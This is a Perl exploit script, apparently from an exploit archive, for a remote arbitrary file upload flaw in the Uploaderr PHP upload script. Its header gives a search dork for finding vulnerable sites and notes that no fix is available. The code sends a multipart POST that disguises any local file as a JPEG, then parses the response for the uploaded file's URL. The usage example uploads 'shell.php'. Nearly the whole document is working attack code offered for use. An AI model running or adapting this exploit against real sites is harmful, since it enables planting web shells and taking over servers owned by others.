Uploaderr remote arbitrary file upload exploit.
8938105dc52c4f3ed77632d06840917ac648d83ac2384c95e4749d61ee928890
#!/usr/bin/perl
#################################################################
#Title: Uploaderr Remote Arbitrary File Upload Exploit #
# #
#Credit: r3dm0v3 #
# http://r3dm0v3.persianblog.ir #
# r3dm0v3[4t]yahoo[dot]com #
# Tehran - Iran #
# #
#Vendor: http://www.uploaderr.com/ #
#Price: 9.95$ #
#Remote: Yes #
#Dork: "Powered by Uploaderr" #
#Fix: Not Available #
# #
#Special thx: Neo limpizik_neo[4t]yahoo[dot]com #
#################################################################
$maxfilesize=250000;
$port=80;
use IO::Socket;
&Banner();
if (@ARGV < 2) {
&Usage();
exit(1);
}
$path = $ARGV[0];
if (substr($path,length($path)-1,1) ne "/"){
$path.="/";
}
$url=$path;
if (lc($url)=~/http:\/\//){
lc($url) =~ /http:\/\/([a-zA-Z0-9.\/_-]+)/;
$url= $1;
}
else{
$url =~ /([a-zA-Z0-9.\/_-]+)/;
$url= $1;
}
$url =~ /([a-zA-Z0-9-_.]+)/;
$host=$1;
$url=~s/$host//;
$file=$ARGV[1];
print "[+] Connecting to $host\n";
open(FILETOUPLOAD,$file) || die "Can not open the file: $!\n";
@filecontent=<FILETOUPLOAD>;
close(FILETOUPLOAD);
$content="-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n".
$maxfilesize."\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"userfile\"; filename=\"".$file."\"\n".
"Content-Type: image/jpeg\n\n".
"@filecontent\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"upload\"\n\n".
"true\n".
"-----------------------------7d92ce322fc0564\n".
"Content-Disposition: form-data; name=\"submitbutton\"\n\n\n".
"-----------------------------7d92ce322fc0564--\n";
$req="POST ".$url."upload.php HTTP/1.1\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d92ce322fc0564\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\n".
"Host: ".$host."\n".
"Content-Length: ".length($content)."\n".
"Connection: Close\n".
"Cache-Control: no-cache\n\n".
$content;
$connect = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || die "Cannot connect to $host: $!\n";
print $connect $req;
while (<$connect>) {
$response.=$_;
}
$response=~ /.+input onclick="javascript:this\.select\(\);" type="text" value="([a-zA-Z0-9.\/:_-]+)" readonly.+/;
$uploadedFile=$1;
if ($uploadedFile){
print "[+] File uploaded: ".$uploadedFile."\n";
}else{
print "[!] Failed.\n";
}
sub Banner{
print "############################################################\n".
"# Uploaderr Remote Arbitrary File Upload Exploit #\n".
"# by r3dm0v3 #\n".
"# r3dm0v3[4t]yahoo[.]com #\n".
"# http://r3dm0v3.persianblog.ir #\n".
"############################################################\n";
}
sub Usage(){
print "\n Usage: uploaderr.pl <host&path> <local_file>\n";
print " ex. : uploaderr.pl site.com/upload/ shell.php\n";
}